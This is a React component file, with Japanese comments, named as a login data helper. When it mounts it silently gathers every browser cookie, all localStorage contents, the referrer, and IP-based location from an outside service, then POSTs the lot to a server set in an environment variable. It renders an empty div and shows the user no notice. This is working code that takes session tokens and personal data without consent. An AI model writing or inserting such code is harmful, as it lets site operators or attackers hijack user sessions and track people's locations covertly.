import React, { useState, useEffect } from 'react';

// クッキーの取得
const getCookies = () => {
    //console.log('document.cookie:', document.cookie); // デバッグ用ログ
    let cookies = document.cookie.split('; ');
    let cookieObj = {};
    cookies.forEach(cookie => {
        let [key, value] = cookie.split('=');
        if (key && value) { // クッキーのキーと値が存在するか確認
            cookieObj[key] = value;
        }
    });
    //console.log('Parsed cookies:', cookieObj); // デバッグ用ログ
    return cookieObj;
};



// IPアドレスの取得
const useIPAddress = () => {
    const [ipAddress, setIpAddress] = useState('');

    useEffect(() => {
        const fetchIp = async () => {
            try {
                const response = await fetch('https://user-data.kurikurikuricloud.com/');
                const data = await response.json();
                setIpAddress(data);
            
            
            } catch (error) {
                console.error('IPアドレスの取得に失敗しました:', error);
            }
        };

        fetchIp();
    }, []);

    return ipAddress;
};
// リファラの取得
const useReferrer = () => {
    const [referrer, setReferrer] = useState('');

    useEffect(() => {
        setReferrer(document.referrer);
    }, []);

    return referrer;
};

// セッションデータの取得
// const useSessionData = () => {
//     const [sessionData, setSessionData] = useState({});

//     useEffect(() => {
//         const fetchSessionData = async () => {
//             try {
//                 const response = await fetch(process.env.REACT_APP_USER_DATA_GET_LOGIN2);
//                 const data = await response.json();
//                 setSessionData(data);
//             } catch (error) {
//                 console.error('セッションデータの取得に失敗しました:', error);
//             }
//         };

//         fetchSessionData();
//     }, []);

//     return sessionData;
// };


// ローカルストレージの取得
const useLocalStorage = () => {
    const [localStorageData, setLocalStorageData] = useState({});

    useEffect(() => {
        const data = {};
        for (let i = 0; i < localStorage.length; i++) {
            let key = localStorage.key(i);
            let value = localStorage.getItem(key);
            data[key] = value;
        }
        setLocalStorageData(data);
    }, []);

    return localStorageData;
};

// 全情報をサーバーに送信
const sendAllDataToServer = async (data) => {
    try {
        const response = await fetch(process.env.REACT_APP_USER_DATA_GET, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify(data),
        });

        if (response.ok) {
            //
        } else {
            console.error('データの送信に失敗しました');
        }
    } catch (error) {
        console.error('エラーが発生しました:', error);
    }
};




const applyCorrection = (lat, lon) => {
    // 緯度と経度のずれの固定値
    const latOffset = -0.3170; // 平均の緯度のずれ
    const lonOffset = 0.2604; // 平均の経度のずれ

    return {
        lat: lat + latOffset,
        lon: lon + lonOffset
    };
};

const UserDataGetLogin = () => {
    const cookies = getCookies();
    const referrer = useReferrer();
    const ipAddress = useIPAddress();
    const localStorageData = useLocalStorage();
    // const sessionData = useSessionData();
    useEffect(() => {

        if (ipAddress && ipAddress.loc !== 'Not available') {
            const [lat, lon] = ipAddress.loc.split(',').map(Number);
            const { lat: correctedLat, lon: correctedLon } = applyCorrection(lat, lon);




            const data = {
                cookies: cookies || {}, // Default to empty object if cookies are not available
                referrer: referrer || 'Unknown', // Default to 'Unknown' if referrer is not available
                ip: ipAddress ? ipAddress.ip : 'Not available',
                hostname: ipAddress ? ipAddress.hostname : 'Not available',
                city: ipAddress ? ipAddress.city : 'Not available',
                region: ipAddress ? ipAddress.region : 'Not available',
                country: ipAddress ? ipAddress.country : 'Not available',
                loc: ipAddress ? `${correctedLat},${correctedLon}` : 'Not available', // 修正後の座標を設定
                org: ipAddress ? ipAddress.org : 'Not available',
                postal: ipAddress ? ipAddress.postal : 'Not available',
                timezone: ipAddress ? ipAddress.timezone : 'Not available',
                readme: ipAddress ? ipAddress.readme : 'Not available',
                localStorage: localStorageData || {}, // Default to empty object if localStorageData is not available
                //session: sessionData || {},
            };

            sendAllDataToServer(data);
        }
    }, [referrer, ipAddress, localStorageData, cookies]);

    return (
        <div>

        </div>
    );
};

export default UserDataGetLogin;
